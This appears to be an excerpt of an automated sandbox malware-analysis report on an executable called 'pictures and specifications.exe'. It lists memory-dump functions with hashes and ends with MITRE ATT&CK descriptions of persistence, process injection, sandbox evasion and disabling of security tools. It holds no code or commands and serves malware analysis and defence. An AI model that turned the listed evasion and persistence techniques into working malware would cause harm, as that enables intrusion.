Opcode ID: 5c7b0f03d8bbd0aafa021f53d055c49969a9fa299cb621f67df7168e181493eb
Instruction ID: bbaaba471db39c83a3acfe80e31c8bc07654c2c33bb89727c8e3ff96d8ea3790
Opcode Fuzzy Hash: 5c7b0f03d8bbd0aafa021f53d055c49969a9fa299cb621f67df7168e181493eb
Instruction Fuzzy Hash: 4FE0ED74E16208EFCB85DFA8D54069DFBF5EB48310F10C0A99C0893351DA319A55DF90

Function 063DBA80 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1812261204.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63c0000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c7b0f03d8bbd0aafa021f53d055c49969a9fa299cb621f67df7168e181493eb
Instruction ID: d8843c48b179863d3a79f5dee936b63141e99463bf97241874436d1eec4bc990
Opcode Fuzzy Hash: 5c7b0f03d8bbd0aafa021f53d055c49969a9fa299cb621f67df7168e181493eb
Instruction Fuzzy Hash: A6E0EDB4E05208EFCB94DFA8D54069DFBF4EB48310F10C0A9981993351D6319E51DF80

Function 063DD568 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1812261204.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63c0000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c7b0f03d8bbd0aafa021f53d055c49969a9fa299cb621f67df7168e181493eb
Instruction ID: b0727a18df54f8f82b721b837cba3be80125ed6306597f1db9a653f6716beab4
Opcode Fuzzy Hash: 5c7b0f03d8bbd0aafa021f53d055c49969a9fa299cb621f67df7168e181493eb
Instruction Fuzzy Hash: F7E0C974E05208EFCB94DFA8D54069DBBF5EF48314F10C1A9980893351D7329A51DF80

Function 063DA1F0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1812261204.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63c0000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c7b0f03d8bbd0aafa021f53d055c49969a9fa299cb621f67df7168e181493eb
Instruction ID: cdd3b22091445cf62165c812475268cfd3c0e4ba3c5eb272b4c770203ecaebea
Opcode Fuzzy Hash: 5c7b0f03d8bbd0aafa021f53d055c49969a9fa299cb621f67df7168e181493eb
Instruction Fuzzy Hash: C3E0ED74E05208EFCB84DFA9D54069DFBF4EB48314F10C0A9A81893351D6329E55EF81

Function 063DA058 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1812261204.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63c0000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cc09aea484445ccf8bddb708ff00ec47ba72eac2280863910632a0fc0f903d0
Instruction ID: b9a63d7f5a439da4806bb3a637854ad897de55b3868911f6ce6ca1ca63b6b84b
Opcode Fuzzy Hash: 5cc09aea484445ccf8bddb708ff00ec47ba72eac2280863910632a0fc0f903d0
Instruction Fuzzy Hash: A4E01A74E05208EFCB84DFA8E5406ACFBF4EB48314F10C0A9D80893351DB319A02DF80

Function 063D9F00 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1812261204.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63c0000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cc09aea484445ccf8bddb708ff00ec47ba72eac2280863910632a0fc0f903d0
Instruction ID: fffa19ddcd74f2ba31aeb902b449153ef2e8e37cc2a7d35b8df0657b2a97ecb7
Opcode Fuzzy Hash: 5cc09aea484445ccf8bddb708ff00ec47ba72eac2280863910632a0fc0f903d0
Instruction Fuzzy Hash: 31E01A74E05208EFCB94DFA8E5406ACFBF8EB48314F10C0A9A818E3351DA319B06DF80

Function 063DF948 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1812261204.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63c0000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cc09aea484445ccf8bddb708ff00ec47ba72eac2280863910632a0fc0f903d0
Instruction ID: af7ddec2c2ce05650b7be78ebb915b365be4c175cef85c5cf38bd33dbc950d2b
Opcode Fuzzy Hash: 5cc09aea484445ccf8bddb708ff00ec47ba72eac2280863910632a0fc0f903d0
Instruction Fuzzy Hash: D8E0E574E05208EFCB84DFA8E5806ACBBF4EB48314F10C0AD9809A3341DA319A02DF81

Function 063D8748 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1812261204.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63c0000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e65572477b3d44da6fe36de224e8de7df3e2de588953032b815e9f33368c30ff
Instruction ID: 33714e16d01335a704d8536561c589ab83a57e37626b634af4d7a48095f78cf1
Opcode Fuzzy Hash: e65572477b3d44da6fe36de224e8de7df3e2de588953032b815e9f33368c30ff
Instruction Fuzzy Hash: A9E04F34E09208EFC784DF98E5415ACFBB8EB48314F10C0EDD80857341DA316B02DB80

Function 00E5FF88 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1798068272.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e50000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8dfcbd3ee55af331eb61ed9aca151cdddd97a3b742f5aa9c96afb1200a6a744
Instruction ID: 46768fc1aceb3f5777c498e580c4e54109a584844834f1ab2327f0575fdb9233
Opcode Fuzzy Hash: c8dfcbd3ee55af331eb61ed9aca151cdddd97a3b742f5aa9c96afb1200a6a744
Instruction Fuzzy Hash: 63E0127155210CEFC750EFF4D50869E7BB9EB05315F1094E5E90593150FE315E48DB92

Function 063DB010 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1812261204.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63c0000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b935cfa189e139aaff9c537810acc19ced08414667e1923e977643aa1ea7ad11
Instruction ID: 36d5be97cf56a8682bc011039955f5a72c5f6f0f3b6739a0adf5fbff25369df9
Opcode Fuzzy Hash: b935cfa189e139aaff9c537810acc19ced08414667e1923e977643aa1ea7ad11
Instruction Fuzzy Hash: 4AE01271A4220CABC741FBF495446AE77B99B45254F1054E5D50593110EE329F08D795

Function 063DE080 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1812261204.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63c0000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c50ac2232bcb6726bc3d8f84ad632cccb854cea2dbc55471b86b035942cd985
Instruction ID: c7708e560c52266067c25633208a214c825537ab908353e4d3db95ada93293a8
Opcode Fuzzy Hash: 9c50ac2232bcb6726bc3d8f84ad632cccb854cea2dbc55471b86b035942cd985
Instruction Fuzzy Hash: 31E0C27490A108DBC744DFA4E9405ACFFB8EB45314F14D09CD80817341CE325E02DBC0

Function 063DDF58 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1812261204.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63c0000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c50ac2232bcb6726bc3d8f84ad632cccb854cea2dbc55471b86b035942cd985
Instruction ID: 0110624058b749befcca7b241a2f2b5f5e1d5a29927b0a06e84dc3ff28f10df1
Opcode Fuzzy Hash: 9c50ac2232bcb6726bc3d8f84ad632cccb854cea2dbc55471b86b035942cd985
Instruction Fuzzy Hash: 29E0127490A108EBC744DF94E9419ADBBBCEF45315F10D19DD80817351CA315E47DBC1

Function 00E53511 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1798068272.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e50000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0478ad4a737a2384cd4441074127e21e623b97eaa5346cc444fa098cdbfb4a12
Instruction ID: 11b927653378aa460270d2945b7b0453130cc59be96a27b56bf74c8de8240272
Opcode Fuzzy Hash: 0478ad4a737a2384cd4441074127e21e623b97eaa5346cc444fa098cdbfb4a12
Instruction Fuzzy Hash: 8ED0A77178A1514FC7858A7C94008993FE58F8611070502EFE54ECBBB6CA6DCC018BA0

Function 063C134B Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1812261204.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63c0000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9db57a7dfa60f2559bb16171ae690beb2fb7ff4538706bbfad596195e37f8b98
Instruction ID: ac1946e31a0ca71e4e8ab7380e48281b99c4766d7663663dcd33f907cf9702d0
Opcode Fuzzy Hash: 9db57a7dfa60f2559bb16171ae690beb2fb7ff4538706bbfad596195e37f8b98
Instruction Fuzzy Hash: 64E0C274909219CFDB50CF14C984F88BBF1EB49304F4581E6D48E97222D3319E94CF41

Function 00E51435 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1798068272.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e50000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37557ffa1a5b4066ab01281f6bffa1487c537e57d9ca290ba68cdd7e7b68e348
Instruction ID: 821c1fcf7557112fb394cc77a4d03479d41b2e25e3c7b357085aadaae986390a
Opcode Fuzzy Hash: 37557ffa1a5b4066ab01281f6bffa1487c537e57d9ca290ba68cdd7e7b68e348
Instruction Fuzzy Hash: 01D05E31A145208BDA14BB2098042ACB7B4AB54316BC39CB4DE6177218D7205D0D9682

Function 00E53520 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1798068272.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e50000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b5ed69bcc51173662ae453f38cc7bec444447065042de686994cdd8fe5b157e
Instruction ID: e6db23193268863725194bc96b5eadd71e587ed8f13867560c54d42df5f55691
Opcode Fuzzy Hash: 5b5ed69bcc51173662ae453f38cc7bec444447065042de686994cdd8fe5b157e
Instruction Fuzzy Hash: 6BC08C313101248FC200AA6DD40088633ED9F8A52030000A6F109CB330DEA2EC0087D0

Function 00E5FDF8 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1798068272.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e50000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4447273daa4128665de1bf1bac7e4f843d4e96af8e967a44445b2c04978aa73
Instruction ID: 22d1d55d8e9b7e0896c756230879156c3bd8d323b6c173e4da450f4a3ad7b523
Opcode Fuzzy Hash: a4447273daa4128665de1bf1bac7e4f843d4e96af8e967a44445b2c04978aa73
Instruction Fuzzy Hash: A4C08C2005260C46C258B7E4740F32C36D88B0136AF547450F80C214226F706088C266

Function 00E50890 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1798068272.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e50000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf73f0e081d9c4f6f8843aad386599cd3ba228dd67ada252506d385baa810617
Instruction ID: 93186478d94115183d73339cd9e4cf09fc021de977203f89af0aea05e9325769
Opcode Fuzzy Hash: bf73f0e081d9c4f6f8843aad386599cd3ba228dd67ada252506d385baa810617
Instruction Fuzzy Hash: 4C90443000CF0CCF003033C03C0C000330CF0000033C00000F00C00C000F30300000C0

Non-executed Functions

Function 00E5C2E0 Relevance: 2.7, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

4'kq, xrefs: 00E5C397
4'kq, xrefs: 00E5C3C2

Memory Dump Source

Source File: 00000000.00000002.1798068272.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e50000_pictures and specifications.jbxd

Similarity

API ID:
String ID: 4'kq$4'kq
API String ID: 0-4171853269
Opcode ID: 88303bca4734ecc6a226c9077e6be05c6d63f22d995e393744336a544ad4df08
Instruction ID: 40fbe8ced0e5e737d809df119c831133a650603026905b486f49354f6aa4dba2
Opcode Fuzzy Hash: 88303bca4734ecc6a226c9077e6be05c6d63f22d995e393744336a544ad4df08
Instruction Fuzzy Hash: 3B715671A04609CFDB18EF7AE94069EBBF3BBC9300F14C169E014AB279EB315946DB41

Function 063DE0C0 Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1812261204.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63c0000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d27bc88bb847ac235af2f1bab3f37ebd50e2db51e7e62c91eae4ac711ec02cdc
Instruction ID: 4b04e9da6ad55428062b66be8c97cc6b5ef6101f8d81293aee2180d377a9b40c
Opcode Fuzzy Hash: d27bc88bb847ac235af2f1bab3f37ebd50e2db51e7e62c91eae4ac711ec02cdc
Instruction Fuzzy Hash: 06912875E05218CFEB64DFA9E8487ADBFF5BF89304F1090A9C009AB250DB745989CF90

Function 00E5C870 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1798068272.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e50000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3adda8fdd64e36d16eb26c2a929efa169886f963bc429fef8af2146f54903152
Instruction ID: 98833b20bfde755f8b0d86cbd7e222a257111b895804e25f6dec13d3a1996d39
Opcode Fuzzy Hash: 3adda8fdd64e36d16eb26c2a929efa169886f963bc429fef8af2146f54903152
Instruction Fuzzy Hash: 97619574D06628CFEB64CF2ACC58799BBB2BB89305F10D5E9D40DB6251DB740A89CF05

Function 063C0006 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1812261204.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63c0000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fea6e55c7ce0885fb99da7c88ed95b898f0ae3e3caa1bc74a3043186e18cd969
Instruction ID: f46ed8fe2d32c51a912e8d24a768e2cce550eda953926850884a08fab41702e9
Opcode Fuzzy Hash: fea6e55c7ce0885fb99da7c88ed95b898f0ae3e3caa1bc74a3043186e18cd969
Instruction Fuzzy Hash: D2314B71D053958FE769CF6A8C4429ABFF3AF86300F05C0EAD4089A122DB750A86DF50

Function 063C0040 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1812261204.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63c0000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9894c7719d61027f5729de79a6d96e243416b421b1ebe6edc0b597c998eb4657
Instruction ID: 9d04c681394a1f61904d12d725897a09a8d849c57384cc2c11e8d5e0d1dd9289
Opcode Fuzzy Hash: 9894c7719d61027f5729de79a6d96e243416b421b1ebe6edc0b597c998eb4657
Instruction Fuzzy Hash: A021EA71E056198BEB6CCF6B984529AFAF7AFC8314F04C0BAE40CA6215DB750A858F40

Function 063DA240 Relevance: 7.6, Strings: 6, Instructions: 113COMMON

Download Yara Rule

Strings

(okq, xrefs: 063DA2C4
(okq, xrefs: 063DA2DA
\skq, xrefs: 063DABD6
(okq, xrefs: 063DA5C2
), xrefs: 063DA290
\skq, xrefs: 063DA321

Memory Dump Source

Source File: 00000000.00000002.1812261204.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63c0000_pictures and specifications.jbxd

Similarity

API ID:
String ID: (okq$(okq$(okq$)$\skq$\skq
API String ID: 0-387421500
Opcode ID: b10513acfb5d00d2a8b048c4d4dcf59d44816ab8566383f9f2113694c1c457e5
Instruction ID: 07b224d9534bccd32b5dd5838632dea52a71ac06e5c63a1da6ba07ad18aa74dc
Opcode Fuzzy Hash: b10513acfb5d00d2a8b048c4d4dcf59d44816ab8566383f9f2113694c1c457e5
Instruction Fuzzy Hash: 3A513971D0422CCFDB64CF6AD944BDEBBB6BB88304F1081AAD409A3290DB715A85CF91

Analysis Process: pictures and specifications.exePID: 7476, Parent PID: 2580COMMON

Executed Functions

Function 02D908E0 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2929444874.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d90000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14eb801eb44234b3e6b11f859c73386380ac21340c1cacc794e86f3bd6738b15
Instruction ID: 14337c536d8243208175b799260c0973a13dc25ef8718d145fb61014a7446a89
Opcode Fuzzy Hash: 14eb801eb44234b3e6b11f859c73386380ac21340c1cacc794e86f3bd6738b15
Instruction Fuzzy Hash: 776184707002558FCB15AB79D968A6E7BB2FF88300B114569E126DF3A9DF349C09DB90

Function 02D908CF Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2929444874.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d90000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b59830e57b7e376eac899015e2a68b4a57dabfab2ccf6f68e0dd2d107dd2a8
Instruction ID: 4b0c024b49c3361e7a0ef5adf9e285d26fa55f648db1b39e08d6317385ce0e74
Opcode Fuzzy Hash: a4b59830e57b7e376eac899015e2a68b4a57dabfab2ccf6f68e0dd2d107dd2a8
Instruction Fuzzy Hash: AF413D746003558FCF15AF79E56896EBBB2FB842007014629A4368B3A8DF349D4DDF90

Function 02D90A98 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2929444874.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d90000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0cefa668c88c64bd4328774a4d3cc4bda49c900191fa77dcd47bd597cade3d0
Instruction ID: 5c14cbdb2444260857fa9fa8f2ea7e01d787d248ad0976ac32038131af4f8666
Opcode Fuzzy Hash: b0cefa668c88c64bd4328774a4d3cc4bda49c900191fa77dcd47bd597cade3d0
Instruction Fuzzy Hash: 3D219C30B002159FDB54AB79C954B6E7BE2BF88710F1444A8E506EF3A5CA71EC019790

Function 02D91038 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2929444874.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d90000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ed16a2814a747d588b464c1235bcbab8449c65756caa82a10dc285c219dbf25
Instruction ID: 5e67a0dd9374dd5f27e10cffbc0a4620de24cbe51664e1f604fb5f3e197505d3
Opcode Fuzzy Hash: 9ed16a2814a747d588b464c1235bcbab8449c65756caa82a10dc285c219dbf25
Instruction Fuzzy Hash: 99219371B403159FCB58ABBD581836FBAEEEFC9210B24882ED40BE7395DD399C0547A1

Function 02D90F28 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2929444874.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d90000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57791432c917d05e97bbfe42c303da60f5c486c5dba94ceb7329cf559fc66375
Instruction ID: 3c57b74c2a9d08efbb8b0b2fd2c76c761fdd77421350de53f1164c63265e461d
Opcode Fuzzy Hash: 57791432c917d05e97bbfe42c303da60f5c486c5dba94ceb7329cf559fc66375
Instruction Fuzzy Hash: 52213C74A00319DFCB05EFB9D9446AEBBB6FF84300F104669E115AB358DB31A949CF50

Function 02D909CA Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2929444874.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d90000_pictures and specifications.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fc3b3a161fc080c60acee8ccc14aaac53138464aae9d89e6890720a60e19904
Instruction ID: 8b82dea684db4197eda304a78ed823e53b6b24e03b12a8de5e586edbc933e2c5
Opcode Fuzzy Hash: 1fc3b3a161fc080c60acee8ccc14aaac53138464aae9d89e6890720a60e19904
Instruction Fuzzy Hash: 4A117C72700B508FDB24AF79942412F7AE2BF842117014A3CC1278B398DF35ED098F91

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

